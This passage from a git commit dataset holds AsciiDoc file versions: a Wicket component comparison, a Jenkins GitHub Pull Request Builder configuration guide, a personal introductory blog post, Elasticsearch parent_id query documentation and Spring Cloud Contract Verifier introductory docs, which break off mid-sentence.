.\n\nimage::..\/img\/uml-component.png[]\n\n....\n@startuml\npackage java.awt {\n\tclass Component\n\tclass Window extends Component\n\t\n\tWindow \"*\" *-- \"1\" Component\n}\n\npackage org.apache.wicket {\n\tclass org.apache.wicket.Component\n\tclass WebPage extends org.apache.wicket.Component\n\t\n\tWebPage \"*\" *-- \"1\" org.apache.wicket.Component\n}\n@enduml\n....\n\nIn both frameworks we find a base class for GUI components called _Component_. Wicket pages can be composed (and usually are) by many components, just like AWT windows are composed by Swing\/AWT components. Both frameworks promote the reuse of presentation code and GUI elements building custom components. Even if Wicket already comes with a rich set of ready-to-use components, building custom components is a common practice when working with this framework. We'll learn more about custom components in the next chapters.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02c225396ce7aceaaca31ef9b13ac836db98812","subject":"Update 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","message":"Update 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io","old_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_contents":"= Presenting: GitHub Pull Request Builder\n\n:hp-image: \/hubpress.github.io\/images\/github-status.png\n:published_at: 2016-04-22\n\nGitHub's existing PR (Pull Request) feature makes it easy to see what changed between branches,\nbut it doesn't always give you the full picture. If you have any kind of automated testing and \ncurrently use Jenkins, the following plugin can give you a full picture of the impact when you're ready to\nmerge a request.\n\nThe https:\/\/wiki.jenkins-ci.org\/display\/JENKINS\/GitHub+pull+request+builder+plugin[GitHub Pull Request Builder] plugin\nis an easy way to plug your own Jenkins jobs into a pull request. High level features:\n\n- Can run any job you can set up in Jenkins\n- Simple whitelist permissions for running PR jobs\n- Trigger phrases for running specific jobs\n- Test results are published into PR status on GitHub\n- Retry jobs with a phrase, in case of a setup issue with a job\n\n#### Installation\nThere are no special instructions for installing the plugin - do as you normally would.\n\n#### Configuring a sample job\n\nimage:github-pull-request-builder-sample-job1.png[SCM]\n\nNOTE: You will need to configure the *Source Code Management* section of your job specifically for the plugin. \nNote in the image above, the *Name*, *Refspec*, and *Branch Specifier* sections - these ensure the plugin can view changes in PR's\nand the job runs against the correct commit hash. You will need to click the *Advanced* button to view some of the above fields.\n\n\nimage:github-pull-request-builder-sample-job2.png[Build Triggers]\n\nNOTE: You will need to select the *Advanced* and *Trigger Setup* buttons to view all of the fields shown above. Here's an explanation\nof the available options:\n\n- anchor:Admin-List[]Admin list: If you would like to approve running a job against a PR, then list here the github users that can approve running the job.\nOur team is small enough that everyone is automatically approved (see the link:#Organization[Organization] section).\n- anchor:GitHub-Hook[]Use GitHub hooks: You may either set the job to poll for new PR's to run against (see the link:#Crontab[Crontab] section),\nor if you check this box, and have GitHub hooks set up, Jenkins will be told when a new PR has been created.\n- anchor:Trigger-Phrase[]Trigger phrase: You can specify a trigger phrase (with regex) to run the job. This can be used to re-run\na job without making changes to the PR, in case of an environmental build failure for example.\n- anchor:Only-Use-Trigger-Phrase[]Only use trigger phrase: Selecting this box will suppress running the job on a PR until the\ntrigger phrase is found in a PR description or comment.\n- anchor:Close-Failed[]Close failed pull request automatically: I've never used this option, but my guess is the name is \nself-explanatory.\n- anchor:Skip-Build-Phrase[]Skip build phrase: You can specify a phrase (with regex) that, if mentioned in the PR description,\nwill suppress running this job. <br\/>**As of May 2016, this feature is broken, and can only be set in the global plugin settings**.\n- anchor:Display-Build-Errors[]Display build errors on downstream builds: I could not find any documentation on this feature, and \nlooking at the code indicates that nothing is using it, so use at your own peril.\n- anchor:Crontab[]Crontab: If you are not using GitHub webhooks, then you will need to set a schedule of when the job should\nlook for PR's to run against. In the sample job image, we're checking every 2 minutes.\n- anchor:Whitelist[]Whitelist: If you choose not to whitelist entire organizations (see the link:#Organization[Organization] section), \nyou have the option to whitelist teams or users. Those who are whitelisted will not require approval to run the job against their PR.\n\nimage:github-pull-request-builder-sample-job3.png[Build Triggers Contd]\n\n- anchor:Organization[]Whitelist Organizations: Check this if you want everyone in the listed organizations\nto be automatically approved, which will trigger the job when the PR is opened.\n- anchor:Allow-Whitelist-Admins[]Allow whitelisted members of organizations as admins: Selecting this box will allow the above\nwhitelisted organizations to act as admins, without naming them individually in the link:#Admin-List[Admin List].\n- anchor:Build-Every-Pull-Request[]Build every pull request automatically without asking: Selecting this box will skip checking the PR\nfor trigger, skip or build phrases, or permissions, and just run the job every time. **Risky**.\n- anchor:Build-Description[]Build description template: The default Jenkins job description will use the PR number and PR title.\nIf you would like to change it, you can here.\n- anchor:Whitelist-Branches[]Whitelist target branches: By adding a branch (or branches) here, it will restrict the job to only\nPR's merging into those branches.\n- anchor:Trigger-Setup[]Trigger setup: At a minimum, I recommend changing the *Commit Status Context* to be specific to this job. \nIf you have multiple job running on each PR, you will see this name displayed in the list of checks on the PR.\n\n#### Impact on your PR\nOnce you have a few jobs configured to check your PR's, and you have run some of them, you will see something like this image\nbelow on your PR:\n\nimage:github-pull-request-builder-sample-job4.png[Build Triggers Contd]\n\nNow you have a better understanding of the impact of your PR, and can keep breaking updates out of your parent branches until you're ready!","old_contents":"= Presenting: GitHub Pull Request Builder\n\n:hp-image: images\/github-status.png\n:published_at: 2016-04-22\n\nGitHub's existing PR (Pull Request) feature makes it easy to see what changed between branches,\nbut it doesn't always give you the full picture. If you have any kind of automated testing and \ncurrently use Jenkins, the following plugin can give you a full picture of the impact when you're ready to\nmerge a request.\n\nThe https:\/\/wiki.jenkins-ci.org\/display\/JENKINS\/GitHub+pull+request+builder+plugin[GitHub Pull Request Builder] plugin\nis an easy way to plug your own Jenkins jobs into a pull request. High level features:\n\n- Can run any job you can set up in Jenkins\n- Simple whitelist permissions for running PR jobs\n- Trigger phrases for running specific jobs\n- Test results are published into PR status on GitHub\n- Retry jobs with a phrase, in case of a setup issue with a job\n\n#### Installation\nThere are no special instructions for installing the plugin - do as you normally would.\n\n#### Configuring a sample job\n\nimage:github-pull-request-builder-sample-job1.png[SCM]\n\nNOTE: You will need to configure the *Source Code Management* section of your job specifically for the plugin. \nNote in the image above, the *Name*, *Refspec*, and *Branch Specifier* sections - these ensure the plugin can view changes in PR's\nand the job runs against the correct commit hash. You will need to click the *Advanced* button to view some of the above fields.\n\n\nimage:github-pull-request-builder-sample-job2.png[Build Triggers]\n\nNOTE: You will need to select the *Advanced* and *Trigger Setup* buttons to view all of the fields shown above. Here's an explanation\nof the available options:\n\n- anchor:Admin-List[]Admin list: If you would like to approve running a job against a PR, then list here the github users that can approve running the job.\nOur team is small enough that everyone is automatically approved (see the link:#Organization[Organization] section).\n- anchor:GitHub-Hook[]Use GitHub hooks: You may either set the job to poll for new PR's to run against (see the link:#Crontab[Crontab] section),\nor if you check this box, and have GitHub hooks set up, Jenkins will be told when a new PR has been created.\n- anchor:Trigger-Phrase[]Trigger phrase: You can specify a trigger phrase (with regex) to run the job. This can be used to re-run\na job without making changes to the PR, in case of an environmental build failure for example.\n- anchor:Only-Use-Trigger-Phrase[]Only use trigger phrase: Selecting this box will suppress running the job on a PR until the\ntrigger phrase is found in a PR description or comment.\n- anchor:Close-Failed[]Close failed pull request automatically: I've never used this option, but my guess is the name is \nself-explanatory.\n- anchor:Skip-Build-Phrase[]Skip build phrase: You can specify a phrase (with regex) that, if mentioned in the PR description,\nwill suppress running this job. <br\/>**As of May 2016, this feature is broken, and can only be set in the global plugin settings**.\n- anchor:Display-Build-Errors[]Display build errors on downstream builds: I could not find any documentation on this feature, and \nlooking at the code indicates that nothing is using it, so use at your own peril.\n- anchor:Crontab[]Crontab: If you are not using GitHub webhooks, then you will need to set a schedule of when the job should\nlook for PR's to run against. In the sample job image, we're checking every 2 minutes.\n- anchor:Whitelist[]Whitelist: If you choose not to whitelist entire organizations (see the link:#Organization[Organization] section), \nyou have the option to whitelist teams or users. Those who are whitelisted will not require approval to run the job against their PR.\n\nimage:github-pull-request-builder-sample-job3.png[Build Triggers Contd]\n\n- anchor:Organization[]Whitelist Organizations: Check this if you want everyone in the listed organizations\nto be automatically approved, which will trigger the job when the PR is opened.\n- anchor:Allow-Whitelist-Admins[]Allow whitelisted members of organizations as admins: Selecting this box will allow the above\nwhitelisted organizations to act as admins, without naming them individually in the link:#Admin-List[Admin List].\n- anchor:Build-Every-Pull-Request[]Build every pull request automatically without asking: Selecting this box will skip checking the PR\nfor trigger, skip or build phrases, or permissions, and just run the job every time. **Risky**.\n- anchor:Build-Description[]Build description template: The default Jenkins job description will use the PR number and PR title.\nIf you would like to change it, you can here.\n- anchor:Whitelist-Branches[]Whitelist target branches: By adding a branch (or branches) here, it will restrict the job to only\nPR's merging into those branches.\n- anchor:Trigger-Setup[]Trigger setup: At a minimum, I recommend changing the *Commit Status Context* to be specific to this job. \nIf you have multiple job running on each PR, you will see this name displayed in the list of checks on the PR.\n\n#### Impact on your PR\nOnce you have a few jobs configured to check your PR's, and you have run some of them, you will see something like this image\nbelow on your PR:\n\nimage:github-pull-request-builder-sample-job4.png[Build Triggers Contd]\n\nNow you have a better understanding of the impact of your PR, and can keep breaking updates out of your parent branches until you're ready!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aaad1d4a43c0d8acad07505e9bb3e18a882ad2ea","subject":"Update 2017-01-17-First-Post.adoc","message":"Update 2017-01-17-First-Post.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-First-Post.adoc","new_file":"_posts\/2017-01-17-First-Post.adoc","new_contents":"= First Post\n:hp-image: \/images\/covers\/winterwonderland.jpg\n:hp-tags: Introduction, Personal\n\nimage::christmasprofile.JPG[Christmas Profile,400,300] \n\nHi, welcome! I am a 24 year old guy living in Toronto. I am interested in a lot of things like technology, the interconnectedness of things, the human brain, music, books and esoteric adventures.\n\nI wished to chronicle my growth as a person as well as leave a record for psychologists to examine in case...well, just in case. I also feel obligated to put my glorious adjustment to anti epilpetic drugs over the past year as a reason for this journaling activity. (Been taking an epileptic drug called Tegretol since I was 10 -> Slowed my brain down for a few years coincinding with my years in university -> Now I m back and with a rejuvinated spirit for learning and fighting the power, which is still my brain lol)\n\nThat's a good segue to tell everyone about my current employment situtation. I spent the last 6 months working for a startup that builds tools for epileptics. I was developing seizure detection algorithms for them, but for various reasons I quit a couple of weeks ago. I still think they ll be a successful company because their mission is pretty complimentary to the needs of 1 in 26 people in this world (Check them out : http:\/\/www.neutun.com\/). I worked on their seizure detection algorithms and testing. Here's what i did : https:\/\/www.youtube.com\/watch?v=Es_uIpyG4FE . Anyway, I have been interviewing to join a few cool projects in machine learning, which is a field that has caught me right in its gaze of unfiltered possibilities. I had an interview with Qualcomm last Friday which went pretty alright and I'm hopeful.\n\nSo yes, that's where I am - partially glad to be spending this Canadian winter in the comforts of my room and working on personal projects including a rigorous quest to achieve physical optimization.\n\nI have a few blog posts coming up - a book review and about the Gross National Happiness idea in Bhutan. So I hope wanderers and friends will come back and read my thoughts on those.\n\nSoon.\n\nAnshuman +\nToronto +\n17 Jan 2017\n\n","old_contents":"= First Post\n:hp-image: \/covers\/winterwonderland.jpg\n:hp-tags: Introduction, Personal\n\nimage::christmasprofile.JPG[Christmas Profile,400,300] \n\nHi, welcome! I am a 24 year old guy living in Toronto. I am interested in a lot of things like technology, the interconnectedness of things, the human brain, music, books and esoteric adventures.\n\nI wished to chronicle my growth as a person as well as leave a record for psychologists to examine in case...well, just in case. I also feel obligated to put my glorious adjustment to anti epilpetic drugs over the past year as a reason for this journaling activity. (Been taking an epileptic drug called Tegretol since I was 10 -> Slowed my brain down for a few years coincinding with my years in university -> Now I m back and with a rejuvinated spirit for learning and fighting the power, which is still my brain lol)\n\nThat's a good segue to tell everyone about my current employment situtation. I spent the last 6 months working for a startup that builds tools for epileptics. I was developing seizure detection algorithms for them, but for various reasons I quit a couple of weeks ago. I still think they ll be a successful company because their mission is pretty complimentary to the needs of 1 in 26 people in this world (Check them out : http:\/\/www.neutun.com\/). I worked on their seizure detection algorithms and testing. Here's what i did : https:\/\/www.youtube.com\/watch?v=Es_uIpyG4FE . Anyway, I have been interviewing to join a few cool projects in machine learning, which is a field that has caught me right in its gaze of unfiltered possibilities. I had an interview with Qualcomm last Friday which went pretty alright and I'm hopeful.\n\nSo yes, that's where I am - partially glad to be spending this Canadian winter in the comforts of my room and working on personal projects including a rigorous quest to achieve physical optimization.\n\nI have a few blog posts coming up - a book review and about the Gross National Happiness idea in Bhutan. So I hope wanderers and friends will come back and read my thoughts on those.\n\nSoon.\n\nAnshuman +\nToronto +\n17 Jan 2017\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d2a6c1627fab6743922c115b7c62564a2998b469","subject":"[DOCS] Fix typo in parent-child example request (#76646)","message":"[DOCS] Fix typo in parent-child example request (#76646)\n\n","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/query-dsl\/parent-id-query.asciidoc","new_file":"docs\/reference\/query-dsl\/parent-id-query.asciidoc","new_contents":"[[query-dsl-parent-id-query]]\n=== Parent ID query\n++++\n<titleabbrev>Parent ID<\/titleabbrev>\n++++\n\nReturns child documents <<parent-join,joined>> to a specific parent document.\nYou can use a <<parent-join,join>> field mapping to create parent-child\nrelationships between documents in the same index.\n\n[[parent-id-query-ex-request]]\n==== Example request\n\n[[parent-id-index-setup]]\n===== Index setup\nTo use the `parent_id` query, your index must include a <<parent-join,join>>\nfield mapping. To see how you can set up an index for the `parent_id` query, try\nthe following example.\n\n. Create an index with a <<parent-join,join>> field mapping.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\n{\n \"mappings\": {\n \"properties\": {\n \"my-join-field\": {\n \"type\": \"join\",\n \"relations\": {\n \"my-parent\": \"my-child\"\n }\n }\n }\n }\n}\n\n----\n\/\/ TESTSETUP\n--\n\n. Index a parent document with an ID of `1`.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/1?refresh\n{\n \"text\": \"This is a parent document.\",\n \"my-join-field\": \"my-parent\"\n}\n----\n--\n\n. Index a child document of the parent document.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/2?routing=1&refresh\n{\n \"text\": \"This is a child document.\",\n \"my-join-field\": {\n \"name\": \"my-child\",\n \"parent\": \"1\"\n }\n}\n----\n--\n\n[[parent-id-query-ex-query]]\n===== Example query\n\nThe following search returns child documents for a parent document with an ID of\n`1`.\n\n[source,console]\n----\nGET \/my-index-000001\/_search\n{\n \"query\": {\n \"parent_id\": {\n \"type\": \"my-child\",\n \"id\": \"1\"\n }\n }\n}\n----\n\n[[parent-id-top-level-params]]\n==== Top-level parameters for `parent_id`\n\n`type`::\n(Required, string) Name of the child relationship mapped for the\n<<parent-join,join>> field.\n\n`id`::\n(Required, string) ID of the parent document. The query will return child\ndocuments of this parent document.\n\n`ignore_unmapped`::\n+\n--\n(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not\nreturn any documents instead of an error. Defaults to `false`.\n\nIf `false`, {es} returns an error if the `type` is unmapped.\n\nYou can use this parameter to query multiple indices that may not contain the\n`type`.\n--\n","old_contents":"[[query-dsl-parent-id-query]]\n=== Parent ID query\n++++\n<titleabbrev>Parent ID<\/titleabbrev>\n++++\n\nReturns child documents <<parent-join,joined>> to a specific parent document.\nYou can use a <<parent-join,join>> field mapping to create parent-child\nrelationships between documents in the same index.\n\n[[parent-id-query-ex-request]]\n==== Example request\n\n[[parent-id-index-setup]]\n===== Index setup\nTo use the `parent_id` query, your index must include a <<parent-join,join>>\nfield mapping. To see how you can set up an index for the `parent_id` query, try\nthe following example.\n\n. Create an index with a <<parent-join,join>> field mapping.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\n{\n \"mappings\": {\n \"properties\": {\n \"my-join-field\": {\n \"type\": \"join\",\n \"relations\": {\n \"my-parent\": \"my-child\"\n }\n }\n }\n }\n}\n\n----\n\/\/ TESTSETUP\n--\n\n. Index a parent document with an ID of `1`.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/1?refresh\n{\n \"text\": \"This is a parent document.\",\n \"my-join-field\": \"my-parent\"\n}\n----\n--\n\n. Index a child document of the parent document.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/2?routing=1&refresh\n{\n \"text\": \"This is a child document.\",\n \"my_join_field\": {\n \"name\": \"my-child\",\n \"parent\": \"1\"\n }\n}\n----\n--\n\n[[parent-id-query-ex-query]]\n===== Example query\n\nThe following search returns child documents for a parent document with an ID of\n`1`.\n\n[source,console]\n----\nGET \/my-index-000001\/_search\n{\n \"query\": {\n \"parent_id\": {\n \"type\": \"my-child\",\n \"id\": \"1\"\n }\n }\n}\n----\n\n[[parent-id-top-level-params]]\n==== Top-level parameters for `parent_id`\n\n`type`::\n(Required, string) Name of the child relationship mapped for the\n<<parent-join,join>> field.\n\n`id`::\n(Required, string) ID of the parent document. The query will return child\ndocuments of this parent document.\n\n`ignore_unmapped`::\n+\n--\n(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not\nreturn any documents instead of an error. Defaults to `false`.\n\nIf `false`, {es} returns an error if the `type` is unmapped.\n\nYou can use this parameter to query multiple indices that may not contain the\n`type`.\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"399be7599cd0f123f1206b49c73e9cd60357846d","subject":" Editing pass for new content (#570)","message":" Editing pass for new content (#570)\n\nOlga Maciaszek-Sharma added very nice content, in the form of a three-second and a three-minute introduction for the verifier. I edited her additions to conform to our usual standards and corporate voice.","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/verifier_introduction.adoc","new_file":"docs\/src\/main\/asciidoc\/verifier_introduction.adoc","new_contents":"== Spring Cloud Contract Verifier Introduction\n\nTIP: The Accurest project was initially started by Marcin Grzejszczak and Jakub Kubrynski\n(http:\/\/codearte.io[codearte.io])\n\nSpring Cloud Contract Verifier enables Consumer Driven Contract (CDC) development of\nJVM-based applications. It moves TDD to the level of software architecture.\n\nSpring Cloud Contract Verifier ships with _Contract Definition Language_ (CDL). Contract\ndefinitions are used to produce the following resources:\n\n* JSON stub definitions to be used by WireMock when doing integration testing on the\nclient code (_client tests_). Test code must still be written by hand, and test data is\nproduced by Spring Cloud Contract Verifier.\n* Messaging routes, if you're using a messaging service. We integrate with Spring\nIntegration, Spring Cloud Stream, Spring AMQP, and Apache Camel. You can also set your\nown integrations.\n* Acceptance tests (in JUnit or Spock) are used to verify if server-side implementation\nof the API is compliant with the contract (__server tests__). A full test is generated by\nSpring Cloud Contract Verifier.\n\n=== Why a Contract Verifier?\n\nAssume that we have a system consisting of multiple microservices:\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Deps.png[Microservices Architecture]\n\n==== Testing issues\n\nIf we wanted to test the application in top left corner to determine whether it can\ncommunicate with other services, we could do one of two things:\n\n- Deploy all microservices and perform end-to-end tests.\n- Mock other microservices in unit\/integration tests.\n\nBoth have their advantages but also a lot of disadvantages.\n\n*Deploy all microservices and perform end to end tests*\n\nAdvantages:\n\n- Simulates production.\n- Tests real communication between services.\n\nDisadvantages:\n\n- To test one microservice, we have to deploy 6 microservices, a couple of databases,\netc.\n- The environment where the tests run is locked for a single suite of tests (nobody else\nwould be able to run the tests in the meantime).\n- They take a long time to run.\n- The feedback comes very late in the process.\n- They are extremely hard to debug.\n\n*Mock other microservices in unit\/integration tests*\n\nAdvantages:\n\n- They provide very fast feedback.\n- They have no infrastructure requirements.\n\nDisadvantages:\n\n- The implementor of the service creates stubs that might have nothing to do with\nreality.\n- You can go to production with passing tests and failing production.\n\nTo solve the aforementioned issues, Spring Cloud Contract Verifier with Stub Runner was\ncreated. The main idea is to give you very fast feedback, without the need to set up the\nwhole world of microservices. If you work on stubs, then the only applications you need\nare those that your application directly uses.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Stubs2.png[Stubbed Services]\n\nSpring Cloud Contract Verifier gives you the certainty that the stubs that you use were\ncreated by the service that you're calling. Also, if you can use them, it means that they\nwere tested against the producer's side. In short, you can trust those stubs.\n\n=== Purposes\n\nThe main purposes of Spring Cloud Contract Verifier with Stub Runner are:\n\n- To ensure that WireMock\/Messaging stubs (used when developing the client) do exactly\nwhat the actual server-side implementation does.\n- To promote ATDD method and Microservices architectural style.\n- To provide a way to publish changes in contracts that are immediately visible on both\nsides.\n- To generate boilerplate test code to be used on the server side.\n\nIMPORTANT: Spring Cloud Contract Verifier's purpose is NOT to start writing business\nfeatures in the contracts. Assume that we have a business use case of fraud check. If a\nuser can be a fraud for 100 different reasons, we would assume that you would create 2\ncontracts, one for the positive case and one for the negative case. Contract tests are\nused to test contracts between applications and not to simulate full behavior.\n\n=== How It Works\n\nThis section explores how Spring Cloud Contract Verifier with Stub Runner works.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour]]\n==== A Three-second Tour\n\nThis very brief tour walks through using Spring Cloud Contract:\n\n* <<spring-cloud-contract-verifier-intro-three-second-tour-producer>>\n* <<spring-cloud-contract-verifier-intro-three-second-tour-consumer>>\n\nYou can find a somewhat longer tour\n<<spring-cloud-contract-verifier-intro-three-minute-tour,here>>.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour-producer]]\n===== On the Producer Side\n\nTo start working with Spring Cloud Contract, add files with `REST\/` messaging contracts\nexpressed in either Groovy DSL or YAML to the contracts directory, which is set by the\n`contractsDslDir` property. By default, it is `$rootDir\/src\/test\/resources\/contracts`.\n\nThen add the Spring Cloud Contract Verifier dependency and plugin to your build file, as\nshown in the following example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins\nportion of the file:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application\ncompliance with the added contracts. By default, the tests get generated under\n`org.springframework.cloud.contract.verifier.tests.`.\n\nAs the implementation of the functionalities described by the contracts is not yet\npresent, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP\nrequests or messages. Also, you must add a correct base test class for auto-generated\ntests to the project. This class is extended by all the auto-generated tests, and it\nshould contain all the setup necessary to run them (for example `RestAssuredMockMvc`\ncontroller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests pass, and both the\napplication and the stub artifacts are built and installed in the local Maven repository.\nThe changes can now be merged, and both the application and the stub artifacts may be\npublished in an online repository.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour-consumer]]\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running\nWireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to `Spring Cloud Contract Stub Runner`, as shown in the\nfollowing example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two\nways:\n\n* By checking out the Producer side repository and adding contracts and generating the stubs\nby running the following commands:\n+\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not\nin place yet, so the automatically-generated contract tests fail.\n* By getting already-existing producer service stubs from a remote repository. To do so,\npass the stub artifact IDs and artifact repository URL as `Spring Cloud Contract\nStub Runner` properties, as shown in the following example:\n+\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation,\nprovide the `group-id` and `artifact-id` values for `Spring Cloud Contract Stub Runner` to\nrun the collaborators' stubs for you, as shown in the following example:\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nTIP: Use the `REMOTE` `stubsMode` when downloading stubs from an online repository and\n`LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or\nmessages that are expected to be emitted by the collaborator service.\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour]]\n==== A Three-minute Tour\n\nThis brief tour walks through using Spring Cloud Contract:\n\n* <<spring-cloud-contract-verifier-intro-three-minute-tour-producer>>\n* <<spring-cloud-contract-verifier-intro-three-minute-tour-consumer>>\n\nYou can find an even more brief tour\n<<spring-cloud-contract-verifier-intro-three-second-tour,here>>.\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour-producer]]\n===== On the Producer Side\n\nTo start working with `Spring Cloud Contract`, add files with `REST\/` messaging contracts\nexpressed in either Groovy DSL or YAML to the contracts directory, which is set by the\n`contractsDslDir` property. By default, it is `$rootDir\/src\/test\/resources\/contracts`.\n\nFor the HTTP stubs, a contract defines what kind of response should be returned for a\ngiven request (taking into account the HTTP methods, URLs, headers, status codes, and so\non). The following example shows how an HTTP stub contract in Groovy DSL:\n\n[source,groovy,indent=0]\n----\npackage contracts\n\norg.springframework.cloud.contract.spec.Contract.make {\n\trequest {\n\t\tmethod 'PUT'\n\t\turl '\/fraudcheck'\n\t\tbody([\n\t\t\t \"client.id\": $(regex('[0-9]{10}')),\n\t\t\t loanAmount: 99999\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n\tresponse {\n\t\tstatus 200\n\t\tbody([\n\t\t\t fraudCheckStatus: \"FRAUD\",\n\t\t\t \"rejection.reason\": \"Amount too high\"\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n}\n----\n\nThe same contract expressed in YAML would look like the following example:\n\n[source,yaml,indent=0]\n----\nrequest:\n method: PUT\n url: \/fraudcheck\n body:\n \"client.id\": 1234567890\n loanAmount: 99999\n headers:\n Content-Type: application\/json\n matchers:\n body:\n - path: $.['client.id']\n type: by_regex\n value: \"[0-9]{10}\"\nresponse:\n status: 200\n body:\n fraudCheckStatus: \"FRAUD\"\n \"rejection.reason\": \"Amount too high\"\n headers:\n Content-Type: application\/json;charset=UTF-8\n----\n\nIn the case of messaging, you can define:\n\n* The input and the output messages can be defined (taking into account from and where it\nwas sent, the message body, and the header).\n* The methods that should be called after the message is received.\n* The methods that, when called, should trigger a message.\n\nThe following example shows a Camel messaging contract expressed in Groovy DSL:\n\n[source,groovy]\n----\ninclude::{verifier_core_path}\/src\/test\/groovy\/org\/springframework\/cloud\/contract\/verifier\/builder\/MessagingMethodBodyBuilderSpec.groovy[tags=trigger_no_output_dsl]\n----\n\nThe following example shows the same contract expressed in YAML:\n\n[source,yml,indent=0]\n----\ninclude::{verifier_core_path}\/src\/test\/resources\/yml\/contract_message_scenario3.yml[indent=0]\n----\n\nThen you can add Spring Cloud Contract Verifier dependency and plugin to your build file,\nas shown in the following example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins\nportion of the file:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application\ncompliance with the added contracts. By default, the generated tests are under\n`org.springframework.cloud.contract.verifier.tests.`.\n\nThe following example shows a sample auto-generated test for an HTTP contract:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nThe preceding example uses Spring's `MockMvc` to run the tests. This is the default test\nmode for HTTP contracts. However, JAX-RX client and explicit HTTP invocations can also be\nused. (To do so, change the `testMode` property of the plugin to `JAX-RS` or 